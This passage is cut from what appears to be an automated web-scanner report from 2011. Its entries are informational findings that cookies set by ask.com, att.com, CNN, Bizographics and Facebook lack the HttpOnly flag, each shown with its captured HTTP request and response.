Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:36:55 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjM2OjU1LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:36:55 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>
<title>Ask Site Policies</title>
<style type="text/css">
.txt_xlg {
font-size: 153.9%;
...[SNIP]...

8.79. http://www.ask.com/web  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /web

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /web?q=xss&search=&qsrc=0&o=0&l=dir HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI0OjAyLVVUQw%3D%3D&po=0&pp=dir; qc=0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.1.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_uid=0A42E34A946D4254193520127E77B26A; wz_sid=084EE34C926D4254193520127E77B26A; wz_scnt=1

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
tr-request-id: TklkhQpcQDoAAAxvduAAAAL7
from-tr: trafrt010iad.io.askjeeves.info
Content-Length: 109507
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:25:09 GMT
Connection: close
Set-Cookie: gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; Domain=.ask.com; Expires=Wed, 14-Sep-2011 18:25:09 GMT; Path=/
Set-Cookie: clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; Domain=.ask.com; Expires=Wed, 14-Sep-2011 18:25:09 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qh=1-eHNz; Domain=.ask.com; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI1OjA5LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:25:09 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   

<title>Ask.com - W
...[SNIP]...

8.80. http://www.att.com/global/images/priceLine_bg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.att.com
Path:   /global/images/priceLine_bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/images/priceLine_bg.gif?01AD=3_ATYKfxPsHlXs-wAujJNxgxEdlwS78fVvGPd1aya5DWfg2SvobYChQ&01RI=00E0DB608ED9193&01NA=na HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Cookie: DL3K=CT-1
Host: www.att.com

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Content-Length: 195
Last-Modified: Wed, 02 Apr 2008 19:28:56 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: image/gif
Cache-Control: max-age=900
Date: Mon, 15 Aug 2011 18:19:20 GMT
Connection: close
Set-Cookie: DL3K=3_ATYKfxPsHlXs-wAujJNxgxEdlwS78fVvGPd1aya5DWfg2SvobYChQ; expires=Mon, 12-Sep-2011 18:19:20 GMT; path=/; domain=www.att.com
P3P: CP="NON DSP ADM DEV PSD OUR IND STP PHY PRE NAV UNI"

GIF89a
......................................................................................................!.......,....
.....@`$.$c.h......".ta.........pH<..H.r.\8.P.tJMX.X.v.Ex.`.xL...h.:...;

8.81. http://www.att.com/homepage/sitemap/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.att.com
Path:   /homepage/sitemap/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /homepage/sitemap/ HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Cookie: DL3K=3PSFsXYqAYUFKqOK_sPf9_3Wh086Y6DglpYWp7s-vVMKvcJOAElUyNA
Host: www.att.com

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Fri, 01 Jul 2011 18:26:18 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 32874
Date: Mon, 15 Aug 2011 18:22:55 GMT
Connection: close
Set-Cookie: TLTHID=9830CC32C76B10C7194C8FA0E36BD744; Path=/; Domain=.att.com
Set-Cookie: TLTSID=9830CC32C76B10C7194C8FA0E36BD744; Path=/; Domain=.att.com
Set-Cookie: TLTUID=9830CC32C76B10C7194C8FA0E36BD744; Path=/; Domain=.att.com; Expires=Mon, 15-08-2021 18:22:54 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AT&amp;T Site Map
...[SNIP]...

8.82. http://www.bizographics.com/collect/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bizographics.com
Path:   /collect/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /collect/?fmt=gif&pid=311 HTTP/1.1
Host: www.bizographics.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KQyjZ9vEOuR1aj5XcunNcMDa7Re6IGD4lIipxjZk1PBFcAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtQiizxJ8nJqAy5GqegFtDb4MEVUJBxdqAyBJTxbAIk5qLhervg1jpjQxsnfYkVZOU3MipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Content-Language: en-US
Date: Mon, 15 Aug 2011 18:45:37 GMT
Location: http://img.bizographics.com/1x1.gif
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a; Domain=.bizographics.com; Expires=Tue, 14-Feb-2012 06:45:37 GMT; Path=/
Set-Cookie: BizoData=0puDrjUMbKuQy8yP8wQLotQb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KazJxz1QQNA2aj5XcunNcMDa7Re6IGD4lH3gMwHCiiisgKAd6xyMUDLG6cRlBGUwzMkGgFZ2wiiZYO4JdcPjwyxF4uCmzSiiJQK8lykQMu396nckTo4nxwoHo0DuhotfR6IACScEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjv7sjLwADd9GswxDbkrdiiisxdJRFsRyXovJiibVtisJNCGohWr1XIQIIGVeDMWB2gjMIisBiitkUr3XlA9M6dE4BpAgrjIo8HSHKMOwhbCzvtRQHWl50vbcvMQEdM8EL3R4f4J5Ufxc35xQDd0MCjXXNxvZEIn9yt55w3TOIwQ0TyFv2zEisHAZjjknyoEvNgUnOhTVe; Domain=.bizographics.com; Expires=Tue, 14-Feb-2012 06:45:37 GMT; Path=/
Content-Length: 0
Connection: keep-alive


8.83. http://www.cnn.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cnn.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.cnn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:44:51 GMT
Server: Apache
Set-Cookie: CG=US:--:--; path=/
Accept-Ranges: bytes
Cache-Control: max-age=60, private, private
Expires: Mon, 15 Aug 2011 18:45:51 GMT
Content-Type: text/html
Vary: User-Agent,Accept-Encoding
Content-Length: 101975
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"><html lang="en"><head><title>CNN.com - Breaking News, U.S., World, Weather, Entertainment &amp; Vid
...[SNIP]...

8.84. http://www.cnn.com/.element/img/3.0/1px.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cnn.com
Path:   /.element/img/3.0/1px.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /.element/img/3.0/1px.gif HTTP/1.1
Host: www.cnn.com
Proxy-Connection: keep-alive
Referer: http://www.cnn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CG=US:--:--

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:44:56 GMT
Server: Apache
Set-Cookie: CG=US:--:--; path=/
Last-Modified: Fri, 23 Oct 2009 20:09:44 GMT
Accept-Ranges: bytes
Content-Length: 43
Cache-Control: max-age=60
Expires: Mon, 15 Aug 2011 18:45:09 GMT
Content-Type: image/gif
Connection: close

GIF89a.............!.......,........@..D..;

8.85. http://www.cnn.com/.element/ssi/auto/3.0/sect/MAIN/facebook_rec.wrapper.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cnn.com
Path:   /.element/ssi/auto/3.0/sect/MAIN/facebook_rec.wrapper.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /.element/ssi/auto/3.0/sect/MAIN/facebook_rec.wrapper.html?&csiID=csi4 HTTP/1.1
Host: www.cnn.com
Proxy-Connection: keep-alive
Referer: http://www.cnn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; tnr:usrvtstg01=1313433954593%7C0%7C0%7C1%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C1%7Cf%7C1%7C7%7C1313433954593; tnr:sesctmp01=1313433954593; s_cc=true; s_sq=%5B%5BB%5D%5D; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; CG=US:--:--

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:16 GMT
Server: Apache
Set-Cookie: CG=US:--:--; path=/
Accept-Ranges: bytes
Cache-Control: max-age=60, private, private
Expires: Mon, 15 Aug 2011 18:45:49 GMT
Content-Type: text/html
Vary: User-Agent,Accept-Encoding
Content-Length: 2271
Connection: close

<html>
<head>
<script type="text/javascript">
var coreDocDomain='';
if(location.hostname.indexOf('cnn.com')>0) { coreDocDomain='cnn.com'; }

...[SNIP]...

8.86. http://www.cnn.com/.element/ssi/misc/3.0/editionvars.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cnn.com
Path:   /.element/ssi/misc/3.0/editionvars.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /.element/ssi/misc/3.0/editionvars.html?&csiID=csi2 HTTP/1.1
Host: www.cnn.com
Proxy-Connection: keep-alive
Referer: http://www.cnn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; tnr:usrvtstg01=1313433954593%7C0%7C0%7C1%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C1%7Cf%7C1%7C7%7C1313433954593; tnr:sesctmp01=1313433954593; s_cc=true; s_sq=%5B%5BB%5D%5D; CG=US:--:--; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:08 GMT
Server: Apache
Set-Cookie: CG=US:--:--; path=/
Accept-Ranges: bytes
Cache-Control: max-age=60, private, private
Expires: Mon, 15 Aug 2011 18:45:13 GMT
Content-Type: text/html
Vary: User-Agent,Accept-Encoding
Content-Length: 9596
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
<script>
                       
...[SNIP]...

8.87. http://www.cnn.com/.element/ssi/www/breaking_news/3.0/banner.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cnn.com
Path:   /.element/ssi/www/breaking_news/3.0/banner.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /.element/ssi/www/breaking_news/3.0/banner.html?&csiID=csi1 HTTP/1.1
Host: www.cnn.com
Proxy-Connection: keep-alive
Referer: http://www.cnn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CG=US:--:--

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:44:56 GMT
Server: Apache
Set-Cookie: CG=US:--:--; path=/
Accept-Ranges: bytes
Cache-Control: max-age=30, private, private
Expires: Mon, 15 Aug 2011 18:45:20 GMT
Content-Type: text/html
Vary: User-Agent,Accept-Encoding
Content-Length: 401
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html><head><script>var cnnDocDomain='';
if(location.hostname.indexOf('cnn.com')>0) { cnnDocDomain='cnn.com'; }
if(location.hostname.in
...[SNIP]...

8.88. http://www.cnn.com/cnn_adspaces/3.0/homepage/main/bot1.120x90.ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cnn.com
Path:   /cnn_adspaces/3.0/homepage/main/bot1.120x90.ad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cnn_adspaces/3.0/homepage/main/bot1.120x90.ad HTTP/1.1
Host: www.cnn.com
Proxy-Connection: keep-alive
Referer: http://www.cnn.com/
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CG=US:--:--

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:44:58 GMT
Server: Apache
Set-Cookie: CG=US:--:--; path=/
Last-Modified: Fri, 29 Oct 2010 02:19:20 GMT
Accept-Ranges: bytes
Content-Length: 581
Cache-Control: max-age=60
Expires: Mon, 15 Aug 2011 18:45:44 GMT
Content-Type: text/plain
Connection: close

<!-- ADSPACE: homepage/main/bot1.120x90 -->


<!-- CALLOUT|http://ads.cnn.com/html.ng/site=cnn&cnn_pagetype=main&cnn_position=120x90_bot1&cnn_rollup=homepage&page.allowcompete=yes&params.styles=fs|
...[SNIP]...

8.89. http://www.cnn.com/cnn_adspaces/3.0/homepage/spon2.126x31.ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cnn.com
Path:   /cnn_adspaces/3.0/homepage/spon2.126x31.ad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cnn_adspaces/3.0/homepage/spon2.126x31.ad HTTP/1.1
Host: www.cnn.com
Proxy-Connection: keep-alive
Referer: http://www.cnn.com/
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; tnr:usrvtstg01=1313433954593%7C0%7C0%7C1%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C1%7Cf%7C1%7C7%7C1313433954593; tnr:sesctmp01=1313433954593; s_cc=true; s_sq=%5B%5BB%5D%5D; CG=US:--:--; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:08 GMT
Server: Apache
Set-Cookie: CG=US:--:--; path=/
Last-Modified: Fri, 29 Oct 2010 02:19:20 GMT
Accept-Ranges: bytes
Content-Length: 579
Cache-Control: max-age=60
Expires: Mon, 15 Aug 2011 18:45:23 GMT
Content-Type: text/plain
Connection: close

<!-- ADSPACE: homepage/spon2.126x31 -->


<!-- CALLOUT|http://ads.cnn.com/html.ng/site=cnn&cnn_pagetype=main&cnn_position=126x31_spon2&cnn_rollup=homepage&page.allowcompete=yes&params.styles=fs|CAL
...[SNIP]...

8.90. http://www.cnn.com/favicon.ie9.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cnn.com
Path:   /favicon.ie9.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ie9.ico HTTP/1.1
Host: www.cnn.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; tnr:usrvtstg01=1313433954593%7C0%7C0%7C1%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C1%7Cf%7C1%7C7%7C1313433954593; tnr:sesctmp01=1313433954593; s_cc=true; s_sq=%5B%5BB%5D%5D; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; CG=US:--:--

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:17 GMT
Server: Apache
Set-Cookie: CG=US:--:--; path=/
Last-Modified: Mon, 30 Aug 2010 15:37:13 GMT
Accept-Ranges: bytes
Content-Length: 5390
Cache-Control: max-age=60
Expires: Mon, 15 Aug 2011 18:45:20 GMT
Content-Type: image/x-icon
X-Pad: avoid browser bug
Connection: close

...... ..........6...........................h.......(... ...@..................................................................................................... ..55..%%..*)..**..""..&&..! ..&&
...[SNIP]...

8.91. http://www.cnn.com/tools/search/cnncom.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cnn.com
Path:   /tools/search/cnncom.xml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tools/search/cnncom.xml HTTP/1.1
Host: www.cnn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; tnr:usrvtstg01=1313433954593%7C0%7C0%7C1%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C1%7Cf%7C1%7C7%7C1313433954593; tnr:sesctmp01=1313433954593; s_cc=true; s_sq=%5B%5BB%5D%5D; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; CG=US:--:--

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:17 GMT
Server: Apache
Set-Cookie: CG=US:--:--; path=/
Last-Modified: Thu, 28 Jan 2010 17:07:10 GMT
Accept-Ranges: bytes
Content-Length: 34192
Cache-Control: max-age=60
Expires: Mon, 15 Aug 2011 18:46:05 GMT
Content-Type: application/xml
Connection: close

<OpenSearchDescription xmlns="http://a9.com/-/spec/opensearch/1.1/" >
<ShortName>CNN.com</ShortName>
<Description>CNN.com Search</Description>
<InputEncoding>UTF-8</InputEncoding>
<Image height="1
...[SNIP]...

8.92. http://www.facebook.com/ConanTheBarbarian  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ConanTheBarbarian

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ConanTheBarbarian?sk=app_108503912579284 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/login.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; lsd=yxUAz; datr=pG8pTrLcOF5vWXJLyEMRGq7p; reg_ext_ref=http%3A%2F%2Fia.media-imdb.com%2Fimages%2FM%2FMV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg%40%40._V1_.swf; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; rdir=/login.php

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: rdir=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FConanTheBarbarian%3Fsk%3Dapp_108503912579284; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.43.49
X-Cnection: close
Date: Mon, 15 Aug 2011 18:24:20 GMT
Content-Length: 49693

<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" xmlns:og="http://opengraphprotocol.org/schema/" lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>Cav
...[SNIP]...

8.93. http://www.facebook.com/home.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
